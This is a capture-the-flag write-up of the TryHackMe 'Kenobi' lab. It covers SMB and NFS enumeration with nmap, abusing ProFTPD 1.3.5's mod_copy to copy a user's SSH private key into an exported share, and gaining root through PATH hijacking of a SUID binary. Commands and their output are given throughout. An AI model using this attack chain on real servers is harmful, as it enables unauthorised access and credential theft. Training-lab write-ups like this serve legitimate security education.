Kenobi - THM

#windows#smb

6 min read

easy
Pub. on 2022-06-02

Samba -> network file system, based on client-server protocol of Server Message Block(SMB). SMB is developed only for windows, samba provides us access from linux machines

SMB has two ports: 139(older port, worked locally, used NetBIOS which is an old transport layer) and 445(came after Windows 2000, uses TCP, thus works over the internet)

  1. Nmap scan
nmap 10.10.129.57 -vvv Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-02 20:51 UTC Initiating Ping Scan at 20:51 Scanning 10.10.129.57 [2 ports] Completed Ping Scan at 20:51, 0.21s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 20:51 Completed Parallel DNS resolution of 1 host. at 20:51, 0.06s elapsed DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 20:51 Scanning 10.10.129.57 [1000 ports] Discovered open port 139/tcp on 10.10.129.57 Discovered open port 111/tcp on 10.10.129.57 Discovered open port 22/tcp on 10.10.129.57 Discovered open port 80/tcp on 10.10.129.57 Discovered open port 21/tcp on 10.10.129.57 Discovered open port 445/tcp on 10.10.129.57 Increasing send delay for 10.10.129.57 from 0 to 5 due to 28 out of 93 dropped probes since last increase. Increasing send delay for 10.10.129.57 from 5 to 10 due to 21 out of 68 dropped probes since last increase. Discovered open port 2049/tcp on 10.10.129.57 Completed Connect Scan at 20:51, 18.50s elapsed (1000 total ports) Nmap scan report for 10.10.129.57 Host is up, received syn-ack (0.19s latency). Scanned at 2022-06-02 20:51:40 UTC for 18s Not shown: 993 closed tcp ports (conn-refused) PORT STATE SERVICE REASON 21/tcp open ftp syn-ack 22/tcp open ssh syn-ack 80/tcp open http syn-ack 111/tcp open rpcbind syn-ack 139/tcp open netbios-ssn syn-ack 445/tcp open microsoft-ds syn-ack 2049/tcp open nfs syn-ack Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds
  1. Enumerate shares using nmap script
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.32.124 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-02 21:34 UTC Nmap scan report for 10.10.32.124 Host is up (0.20s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.32.124\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.32.124\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.32.124\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> Nmap done: 1 IP address (1 host up) scanned in 32.01 seconds
  1. Check out anonymous share, and download everything in it
smbget -R smb://10.10.32.124/anonymous Password for [user] connecting to //anonymous/10.10.32.124: Using workgroup WORKGROUP, user user smb://10.10.32.124/anonymous/log.txt Downloaded 11.95kB in 6 seconds

Nmap port scan showed port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve. In this case, port 111 is access to a network file system.

  1. Enumerate port 111 using nmap and some scripts
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.32.124 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-02 21:57 UTC Nmap scan report for 10.10.32.124 Host is up (0.25s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-showmount: |_ /var * Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
  1. Search for an exploit for ProFtpd server, by using its version number, on exploit-db.com. The current version (1.3.5) has an exploit from ProFtpd's mod_copy module
  2. The mod_copy module implements SITE CPFR and SITE CPTO commands, which copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the file system to a chosen destination
  3. COPY Kenobi's private key
nc 10.10.49.99 21 # 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.49.99] # SITE CPFR /home/kenobi/.ssh/id_rsa # 350 File or directory exists, ready for destination name # SITE CPTO /var/tmp/id_rsa # 250 Copy successful # ^C
  1. Since the /var directory was a mount, mount it on the file system
sudo mkdir /mnt/KenobiNFS # [sudo] password for root: mount 10.10.49.99:/var /mnt/KenobiNFS # mount: /mnt/KenobiNFS: must be superuser to use mount. # dmesg(1) may have more information after failed mount system call. sudo mount 10.10.49.99:/var /mnt/KenobiNFS ls /mnt/KenobiNFS # backups cache crash lib local lock log mail opt run snap spool tmp www
  1. Get the private key and login to Kenobi's account via ssh
cp /mnt/KenobiNFS/tmp/id_rsa . ssh -i id_rsa kenobi@10.10.49.99
  1. Check if root
ls /root # ls: cannot open directory '/root': Permission denied

rwSrwSrwT

SUID Bit - User executes the file with permissions of the file owner

SGID Bit -> for files, the user executes the file with the permission of the group owner. For directories, the file created in directory gets the same group owner.

Sticky Bit -> applies to directories; users are prevented from deleting files belonging to other users.

  1. Search the system for files having the SUID bit set
find / -perm -u=s -type f 2>/dev/null # /sbin/mount.nfs # /usr/lib/policykit-1/polkit-agent-helper-1 # /usr/lib/dbus-1.0/dbus-daemon-launch-helper # /usr/lib/snapd/snap-confine # /usr/lib/eject/dmcrypt-get-device # /usr/lib/openssh/ssh-keysign # /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic # /usr/bin/chfn # /usr/bin/newgidmap # /usr/bin/pkexec # /usr/bin/passwd # /usr/bin/newuidmap # /usr/bin/gpasswd # /usr/bin/menu # /usr/bin/sudo # /usr/bin/chsh # /usr/bin/at # /usr/bin/newgrp # /bin/umount # /bin/fusermount # /bin/mount # /bin/ping # /bin/su # /bin/ping6

Investigate these files, checkout menu, then run 'strings' option with menu, and realize that it calls the functions curl, uname and ifconfig without the full path

  1. Do a privilege escalation with PATH variable manipulation
ls /usr/bin/menu -la # -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu echo /bin/sh > /tmp/ifconfig export PATH=/tmp:$PATH chmod 777 /tmp/ifconfig /usr/bin/menu # # *************************************** # 1. status check # 2. kernel version # 3. ifconfig # ** Enter your choice :3 ls # share user.txt ls /root # root.txt cat /root/root.txt # 177***************************
** THE END **